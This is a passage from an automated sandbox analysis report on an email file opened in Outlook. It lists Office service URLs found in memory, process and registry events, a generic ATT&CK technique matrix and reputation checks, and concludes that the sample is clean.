Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://pushchannel.1drv.ms
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://res.cdn.office.net
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://res.cdn.office.net/mro1cdnstorage/fonts/prod/4.40
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://res.cdn.office.net/polymer/models
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://safelinks.protection.outlook.com/api/GetPolicy
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://service.officepy.microsoftusercontent.com/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://service.powerapps.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://settings.outlook.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://staging.cortana.ai
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://substrate.office.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://substrate.office.com/Notes-Internal.ReadWrite
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://tasks.office.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://templatesmetadata.office.net/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://useraudit.o365auditrealtimeingestion.manage.office.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://webshell.suite.office.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://word-edit.officeapps.live.com/we/rrdiscovery.ashx
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://wus2.contentsync.
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://wus2.pagecontentsync.
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://www.odwebp.svc.ms
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://www.yammer.com
Source: classification engineClassification label: clean1.winEML@3/11@0/0
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmpJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20241013T2236000523-7832.etlJump to behavior
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\9ba54f65-7bc2-d549-b688-53131649ef52.eml"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "D675929E-58F5-446D-A282-324992C7C8DE" "6968D5F9-FDC3-4959-BF37-5B5D02ACDBD9" "7832" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "D675929E-58F5-446D-A282-324992C7C8DE" "6968D5F9-FDC3-4959-BF37-5B5D02ACDBD9" "7832" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: c2r64.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: userenv.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3}\InprocServer32Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEWindow found: window name: SysTabControl32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile Volume queried: C:\Windows\SysWOW64 FullSizeInformationJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information queried: ProcessInformationJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading		1
Process Injection		1
Masquerading		OS Credential Dumping1
Process Discovery		Remote ServicesData from Local SystemData ObfuscationExfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory13
System Information Discovery		Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
DLL Side-Loading		Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 process2 2 Behavior Graph ID: 1532881 Sample: 9ba54f65-7bc2-d549-b688-531... Startdate: 14/10/2024 Architecture: WINDOWS Score: 1 5 OUTLOOK.EXE 49 93 2->5         started        process3 7 ai.exe 5->7         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://api.diagnosticssdf.office.com0%URL Reputationsafe
https://api.diagnosticssdf.office.com0%URL Reputationsafe
https://login.microsoftonline.com/0%URL Reputationsafe
https://shell.suite.office.com:14430%URL Reputationsafe
https://designerapp.azurewebsites.net0%URL Reputationsafe
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize0%URL Reputationsafe
https://autodiscover-s.outlook.com/0%URL Reputationsafe
https://useraudit.o365auditrealtimeingestion.manage.office.com0%URL Reputationsafe
https://outlook.office365.com/connectors0%URL Reputationsafe
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://api.addins.omex.office.net/appinfo/query0%URL Reputationsafe
https://clients.config.office.net/user/v1.0/tenantassociationkey0%URL Reputationsafe
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://lookup.onenote.com/lookup/geolocation/v10%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech0%URL Reputationsafe
https://api.powerbi.com/v1.0/myorg/imports0%URL Reputationsafe
https://cloudfiles.onenote.com/upload.aspx0%URL Reputationsafe
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://entitlement.diagnosticssdf.office.com0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%URL Reputationsafe
https://canary.designerapp.0%URL Reputationsafe
https://ic3.teams.office.com0%URL Reputationsafe
https://www.yammer.com0%URL Reputationsafe
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies0%URL Reputationsafe
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive0%URL Reputationsafe
https://cr.office.com0%URL Reputationsafe
https://messagebroker.mobile.m365.svc.cloud.microsoft0%URL Reputationsafe
https://portal.office.com/account/?ref=ClientMeControl0%URL Reputationsafe
https://clients.config.office.net/c2r/v1.0/DeltaAdvisory0%URL Reputationsafe
https://edge.skype.com/registrar/prod0%URL Reputationsafe
https://graph.ppe.windows.net0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://tasks.office.com0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%URL Reputationsafe
https://sr.outlook.office.net/ws/speech/recognize/assistant/work0%URL Reputationsafe
https://api.scheduler.0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://api.aadrm.com0%URL Reputationsafe
https://edge.skype.com/rps0%URL Reputationsafe
https://globaldisco.crm.dynamics.com0%URL Reputationsafe
https://messaging.engagement.office.com/0%URL Reputationsafe
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://api.diagnosticssdf.office.com/v2/feedback0%URL Reputationsafe
https://api.powerbi.com/v1.0/myorg/groups0%URL Reputationsafe
https://web.microsoftstream.com/video/0%URL Reputationsafe
https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
https://graph.windows.net0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://analysis.windows.net/powerbi/api0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://substrate.office.com0%URL Reputationsafe
https://outlook.office365.com/autodiscover/autodiscover.json0%URL Reputationsafe
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios0%URL Reputationsafe
https://consent.config.office.com/consentcheckin/v1.0/consents0%URL Reputationsafe
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech0%URL Reputationsafe
https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices0%URL Reputationsafe
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json0%URL Reputationsafe
https://safelinks.protection.outlook.com/api/GetPolicy0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/0%URL Reputationsafe
http://weather.service.msn.com/data.aspx0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://officepyservice.office.net/service.functionality0%URL Reputationsafe
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks0%URL Reputationsafe
https://templatesmetadata.office.net/0%URL Reputationsafe
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios0%URL Reputationsafe
https://messaging.lifecycle.office.com/0%URL Reputationsafe
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml0%URL Reputationsafe
https://mss.office.com0%URL Reputationsafe
https://pushchannel.1drv.ms0%URL Reputationsafe
https://management.azure.com0%URL Reputationsafe
https://outlook.office365.com0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://incidents.diagnostics.office.com0%URL Reputationsafe
https://clients.config.office.net/user/v1.0/ios0%URL Reputationsafe
https://make.powerautomate.com0%URL Reputationsafe
https://api.addins.omex.office.net/api/addins/search0%URL Reputationsafe
https://insertmedia.bing.office.net/odc/insertmedia0%URL Reputationsafe
https://outlook.office365.com/api/v1.0/me/Activities0%URL Reputationsafe
https://api.office.net0%URL Reputationsafe
https://incidents.diagnosticssdf.office.com0%URL Reputationsafe
https://asgsmsproxyapi.azurewebsites.net/0%URL Reputationsafe
https://clients.config.office.net/user/v1.0/android/policies0%URL Reputationsafe
https://entitlement.diagnostics.office.com0%URL Reputationsafe
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json0%URL Reputationsafe
https://my.microsoftpersonalcontent.com0%VirustotalBrowse
https://outlook.office.com/autosuggest/api/v1/init?cvid=0%VirustotalBrowse
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false1%VirustotalBrowse
https://d.docs.live.net0%VirustotalBrowse
https://api.microsoftstream.com/api/0%VirustotalBrowse
https://otelrules.svc.static.microsoft0%VirustotalBrowse

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://api.diagnosticssdf.office.comE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
  • URL Reputation: safe
  • URL Reputation: safe
unknown
https://login.microsoftonline.com/E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
  • URL Reputation: safe
unknown
https://shell.suite.office.com:1443E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
  • URL Reputation: safe
unknown
https://designerapp.azurewebsites.netE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
  • URL Reputation: safe
unknown
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
  • URL Reputation: safe
unknown
https://autodiscover-s.outlook.com/E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
  • URL Reputation: safe
unknown
https://useraudit.o365auditrealtimeingestion.manage.office.comE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
  • URL Reputation: safe
unknown
https://outlook.office365.com/connectorsE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
  • URL Reputation: safe
unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
  • URL Reputation: safe
unknown
https://cdn.entity.E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
  • URL Reputation: safe
unknown
https://api.addins.omex.office.net/appinfo/queryE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
  • URL Reputation: safe
unknown
https://clients.config.office.net/user/v1.0/tenantassociationkeyE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
  • URL Reputation: safe
unknown
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
  • URL Reputation: safe
unknown
https://powerlift.acompli.netE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
  • URL Reputation: safe
unknown
https://rpsticket.partnerservices.getmicrosoftkey.comE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
  • URL Reputation: safe
unknown
https://lookup.onenote.com/lookup/geolocation/v1E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
  • URL Reputation: safe
unknown
https://cortana.aiE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
  • URL Reputation: safe
unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
  • URL Reputation: safe
unknown
https://api.powerbi.com/v1.0/myorg/importsE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
  • URL Reputation: safe
unknown
https://cloudfiles.onenote.com/upload.aspxE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
  • URL Reputation: safe
unknown
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
  • URL Reputation: safe
unknown
https://entitlement.diagnosticssdf.office.comE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
  • URL Reputation: safe
unknown
https://api.aadrm.com/E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
  • URL Reputation: safe
unknown
https://ofcrecsvcapi-int.azurewebsites.net/E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
  • URL Reputation: safe
unknown
https://canary.designerapp.E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
  • URL Reputation: safe
unknown
https://ic3.teams.office.comE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
  • URL Reputation: safe
unknown
https://www.yammer.comE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
  • URL Reputation: safe
unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
  • URL Reputation: safe
